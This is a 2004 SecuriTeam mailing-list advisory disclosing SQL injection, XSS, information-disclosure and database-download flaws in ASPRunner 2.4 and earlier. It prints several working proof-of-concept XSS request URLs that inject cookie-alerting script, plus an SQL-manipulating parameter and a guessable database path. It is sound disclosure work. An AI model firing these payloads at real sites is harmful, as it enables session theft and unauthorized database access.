[NT] Multiple Vulnerabilities in ASPRunner
From: SecuriTeam (support_at_securiteam.com)
Date: 07/27/04
- Previous message: SecuriTeam: "[UNIX] PostNuke Multiple Vulnerabilities In Xanthia Module"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 27 Jul 2004 19:52:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Vulnerabilities in ASPRunner
------------------------------------------------------------------------
SUMMARY
" <http://www.xlinesoft.com/asprunner/> ASPRunner creates a set of ASP
pages to access and modify Oracle, SQL Server, MS Access, DB2, MySQL, or
FileMaker databases, or any other ODBC data source. Using generated ASP
pages, users can search, sort, edit, delete and add data into a database.
ASPRunner is easy to learn, you can get started in just 10 minutes!".
ASPRunner suffers from multiple vulnerabilities that allow a remote
attacker to perform SQL Injection and XSS attacks as well as gather
sensitive information.
DETAILS
Vulnerable Systems:
* ASPRunner version 2.4 and below
SQL Injection:
Every Page is vulnerable to SQL Injection attacks. (Login pages are not
vulnerable). No POC is provided because the SQL Injection attacks depend
on database type and structure.
Information Disclosure:
An attacker can gain several information from hidden fields and file
names.
* File names disclosure database generated table name.
* Several hidden field shows complete SQL Queries
* These hidden fields can also be modified.
* Errors generate detailed page which gives lots of information to the
client.
XSS (Cross Site Scripting):
There are no checks within the product for XSS attacks. Here are samples
from several pages:
* [TABLE]_search.asp (post)
http://[VICTIM]/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word_id&
NeedQuoteswordid=False%2C False&Typewordid=3%2C
3&SearchOption=Contains&SearchFor=&FieldName=tr&NeedQuotestr=True&
Typetr=202&SearchOption=Contains&SearchFor=&FieldName=en&
NeedQuotesen=True&Typeen=202&SearchOption=Contains&
SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&
FieldName=desc&NeedQuotesdesc=True&Typedesc=203&
SearchOption=Contains&SearchFor=
* [TABLE]_edit.asp (post)
http://[VICTIM]/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPageNumber=1&
SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eselect
%5Bword_id%5D%2C %5Bword_id%5D%2C %5Btr%5D%2C %5Ben%5D%2C %5Bdesc%5D
From %5Bdictionary%5D order by %5Ben%5D
desc&NeedQuoteswordid=False&NeedQuotes=&NeedQuotes=&action=view
* [TABLE]_list.asp (post)
http://[VICTIM]/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPage=&action=Search&
SQL=select %5Bword_id%5D%2C %5Bword_id%5D%2C %5Btr%5D%2C %5Ben%5D%2C
%5Bdesc%5D From %5Bdictionary%5D where 1%3D0 or %5Btr%5D like
%27%25&orderby= order by %5Ben%5D
desc&PageSize=20&SearchField=AnyField&SearchOption=Contains&
SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&
PageSizeSelect=20&NeedQuoteswordid=False&Typewordid=3&
NeedQuoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&
NeedQuotesen=True&Typeen=202&NeedQuotesdesc=True&Typedesc=203
* export.asp (post)
http://[VICTIM]/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eselect %5Bword_id%5D%2C %5Bword_id%5D%2C %5Btr%5D%2C %5Ben%5D%2C %5Bdesc%5D From %5Bdictionary%5D order by %5Ben%5D desc&mypage=1&pagesize=20
Database Download:
The database can be downloaded over the web. This is not a critical issue
because there is no way to determine the filename. But it's easy to guess
it by gathering information about table and field names.
MS Access or other database file (if it's not MS SQL, similar or ODBC
Connection) can be found on http://[VICTIM]/db/[DB-FILE-NAME]
Disclosure Timeline:
Discovered: 04.07.2004
Vendor Informed: 05.07.2004
Published: 26.07.2004
ADDITIONAL INFORMATION
The information has been provided by <mailto:ferruh@mavituna.com> Ferruh
Mavituna.
The original article can be found at:
<http://ferruh.mavituna.com/article/?574>
http://ferruh.mavituna.com/article/?574
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] PostNuke Multiple Vulnerabilities In Xanthia Module"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
